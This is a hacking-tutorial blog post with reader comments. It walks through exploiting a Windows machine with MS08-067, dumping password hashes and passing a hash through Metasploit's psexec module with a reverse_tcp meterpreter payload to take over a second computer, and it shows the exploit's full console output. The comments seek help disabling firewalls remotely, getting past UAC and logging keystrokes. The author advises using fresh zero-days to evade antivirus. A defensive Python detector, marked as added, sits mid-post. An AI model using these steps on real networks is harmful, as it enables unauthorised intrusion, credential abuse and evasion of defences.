Using PsEXEC with Metasploit to Login Using Password Hash



Type: Tutorial

Level: Medium, Advanced

The main problem people have with passwords nowadays is that they are hard to remember, which is why people usually use the same password for every account and even for every device they have. For example, in a school, university, or office with a lot of computers, it is impractical to give every computer a different password, especially when the people who use the computers are not familiar with them. That is why the same password is usually used on all of the computers: when a problem occurs, the IT person maintains or remotes into the machine using the template password already provided.

In this tutorial, we will compromise one victim computer and get its password hash, then log in to another computer (with the same password) using that password hash, with no need to crack the password to plain text first 🙂


Requirements:

1. Metasploit Framework

2. Linux operating system or BackTrack 5 (Metasploit Framework is already included in this distro)

Step By Step Using PsEXEC with Metasploit to Login Using Password Hash:

1. First of all, you need a vulnerable target; set your payload to run Meterpreter when the exploit launches successfully. You can view my previous post about meterpreter search (see step 1). In this example I use the exploit/windows/smb/ms08_067_netapi exploit.


2. Once inside the victim computer, we get the password hashes.

FYI: in this case I use the username victim and assume that every username in that place is also victim (but usually the username is Administrator).


3. Okay, after we get the victim's password hashes, we try to connect to another victim that "maybe" uses the same password (or maybe they are in the same network :-p ). I use psexec here and set the payload to meterpreter reverse_tcp.


4. You can see which options this exploit and payload have by running show options.

msf exploit(psexec) > show options

Module options (exploit/windows/smb/psexec):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   RHOST                       yes       The target address
   RPORT      445              yes       Set the SMB service port
   SHARE      ADMIN$           yes       The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
   SMBDomain  WORKGROUP        no        The Windows domain to use for authentication
   SMBPass                     no        The password for the specified username
   SMBUser                     no        The username to authenticate as

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique: seh, thread, process, none
   LHOST                      yes       The listen address
   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic

Information:

RHOST = remote host or target IP address

SMBPass = password hash

SMBUser = username

LHOST = our local computer, used for the attack

5. Those are the options we need to set up; below is my configuration on my BackTrack 5 box.

[screenshot]

6. After everything is set up correctly, launch the exploit command.

msf exploit(psexec) > exploit

[*] Started reverse handler on 
[*] Connecting to the server...
[*] Authenticating to|WORKGROUP as user 'victim'...
[*] Uploading payload...
[*] Created \hMnZxVRG.exe...
[*] Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:[\svcctl] ...
[*] Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:[\svcctl] ...
[*] Obtaining a service manager handle...
[*] Creating a new service (nRxylOJY - "MIkxdjvELJLYUpzSEqmpscBGIwls")...
[*] Closing service handle...
[*] Opening service...
[*] Starting the service...
[*] Removing the service...
[*] Closing service handle...
[*] Deleting \hMnZxVRG.exe...
[*] Sending stage (752128 bytes) to
[*] Meterpreter session 2 opened ( -> at 2011-07-16 01:26:24 +0800

meterpreter > shell
Process 1876 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.


Below is my screenshot:

[screenshot]

That's it! We're now on another computer. We successfully connected to a separate computer with the same credentials without having to worry about cracking the password.

Hope it's useful.
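From the defender's side, the sequence in the psexec output above (SMB authentication, an executable written to ADMIN$, a new service created and started) leaves a network logon followed by a service install on the target. The following added example, which is not part of the original tutorial, correlates those two events; the event dictionaries are constructed and simplified from Windows event IDs 4624 and 7045, and all field names, hosts and addresses are assumptions.

```python
import re
from datetime import datetime, timedelta

# Constructed sample events, simplified from the Windows Security (4624)
# and System (7045) logs. Hosts, addresses and names are made up.
EVENTS = [
    {"host": "PC-02", "time": "2011-07-16T01:26:20", "id": 4624, "logon_type": 3,
     "auth_pkg": "NTLM", "user": "victim", "src_ip": "192.0.2.10"},
    {"host": "PC-02", "time": "2011-07-16T01:26:22", "id": 7045,
     "service": "qWzTkLbA", "image_path": r"%SystemRoot%\aBcDeFgH.exe"},
    {"host": "PC-03", "time": "2011-07-16T09:00:00", "id": 4624, "logon_type": 2,
     "auth_pkg": "Negotiate", "user": "victim", "src_ip": "-"},
    {"host": "PC-03", "time": "2011-07-16T09:00:05", "id": 7045,
     "service": "Print Spooler Helper",
     "image_path": r"C:\Program Files\Vendor\helper.exe"},
]

# An executable sitting directly in the Windows directory (where ADMIN$ points)
# with a letters-only name, like the one in the psexec output above.
DROPPED_EXE = re.compile(
    r"^(%SystemRoot%|[A-Za-z]:\\Windows)\\[A-Za-z]{6,12}\.exe$", re.I)
WINDOW = timedelta(seconds=60)  # assumed correlation window


def parse(ts):
    return datetime.strptime(ts, "%Y-%m-%dT%H:%M:%S")


def find_psexec_style_installs(events):
    """Return (host, service, user, src_ip) for each matching service install
    that follows an NTLM network logon on the same host within WINDOW."""
    findings = []
    logons = [e for e in events if e["id"] == 4624
              and e["logon_type"] == 3 and e["auth_pkg"] == "NTLM"]
    for svc in (e for e in events if e["id"] == 7045):
        if not DROPPED_EXE.match(svc["image_path"]):
            continue
        t = parse(svc["time"])
        for lg in logons:
            delta = t - parse(lg["time"])
            if lg["host"] == svc["host"] and timedelta(0) <= delta <= WINDOW:
                findings.append((svc["host"], svc["service"], lg["user"], lg["src_ip"]))
                break
    return findings


if __name__ == "__main__":
    for finding in find_psexec_style_installs(EVENTS):
        print("suspicious remote service install:", finding)
```

Legitimate remote administration tools also install services over SMB, so a match is a lead to review rather than a verdict.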


Blogger at hacking-tutorial.com. Love PHP, offensive security and web. Contact him at me[-at-]vishnuvalentino.com

See all posts by || Visit Website : http://www.vishnuvalentino.com


  • Avi Nash

    awesome post.. thanks a lot 😀

  • Amigo

    I tried everything… and no luck

    [*] Creating a new service (MpAgHiEE – “MIgX”)…
    [*] Closing service handle…
    [*] Opening service…
    [*] Starting the service…
    [-] Error: DCERPC FAULT => nca_s_fault_ndr
    [*] Exploit completed, but no session was created.

    Can you help me?

    • v4L

      what’s this? PsExec with metasploit?

      • Amigo

        Yes… (exploit/windows/smb/psexec)

        BTW… I found the problem, a firewall 🙁

        How do you disable a firewall (not windows firewall) remotely?

        thank you for your time.

        • v4L

          I have no idea for that, there’s more than a hundred or more firewall available on the net with different behavior.

        • I encountered this problem. Turn off the firewall remotely via Windows Manager then connect to that machine via host name. However, in a pure windows environment (YOU MUST KNOW THE PASSWORD) on the remote machine. Be aware that there are DOS commands you can use to turn off a firewall remotely, however it can not be done directly. Using pure windows tools and nothing else, it is unlikely the firewall will get turned off unless your target is using an admin account and you trick them into executing a program or batch file of sorts, but wait. If there is an antivirus program running, it will more likely stop this action. A good estimate would be that 99% of any action without more advanced tools will get stopped. Experimenting in a lab of hard knocks and solving real world problems when you MUST access a remote machine in another city, state or across the world truly tests admins every day. What is interesting here is, there are a series of facts that have been left out that truly require a lab environment to test. I must commend the web master for bringing to light this information, no matter how old it is. When you see something be sure to share it with your friends who are interested in the details. Understanding the details will give you a better knowledge of why.

          • v4L

            Hi James, yes, you need to test all the tutorials here in your own lab first. Your analysis was correct, because most AV will catch it as a virus. If you want some exploit that is not detected by antivirus, maybe you can find an exploit with zeroday status that has just come fresh out of the oven, so you need to run fast before the AV detects it.
            Because every exploit or vulnerability that comes out or is written about on the internet will be seen by everyone in this world who uses the internet, including the antivirus companies, which will end with a “patch” for that exploit and vulnerability.

  • Hello, Good Morning

    I need help from you. For now I have a hard problem with Windows 7 UAC.

    The details are as follows:

    I used msf/scanner/smb/smb_login, and I found USERNAME: administrator, PASSWORD: 1234qwer.

    Then I want to link in to my goal (Windows 7 (6.1.7601 Service Pack 1 Build 7601)). But I have to create the shell or use psexec. It is a great pity that it does not work because of UAC.

    Can you tell me how to create the shell or upload the payload? Many thanks for your help in advance

    • v4L

      you can view the tutorial here : http://www./tips-and-trick/13-metasploit-meterpreter-file-system-command-you-should-know/ or here http://www./hacking-tutorial/10-steps-to-use-netcat-as-a-backdoor-in-windows-7-system/

  • This week and last I did some extensive work with psexec and discovered while at work in a secured environment (Antivirus) has to be turned off and to remote execute the share has to be active and you have to be admin on both machines or submit a password for using an account on the remote machine. I believe everything we learn here requires a network with no antivirus software activated because in the real world or at least my world, some of these things will not work. Unless your antivirus program is AVG- I’m just sayin~

  • alijanlou

    Hi, I have one question.
    When I am using the /windows/smb/ms08_067_netapi exploit
    and payload windows/shell/reverse_tcp, after the exploit completes I have 1 session and a shell on the target system. My question is: how can I use the session for keyscan? (How can I exit the shell and use other commands?)

    • v4L


      use ‘background’

      The ‘background’ command will send the current Meterpreter session to the background and return you to the msf prompt. To get back to your Meterpreter session, just interact with it again.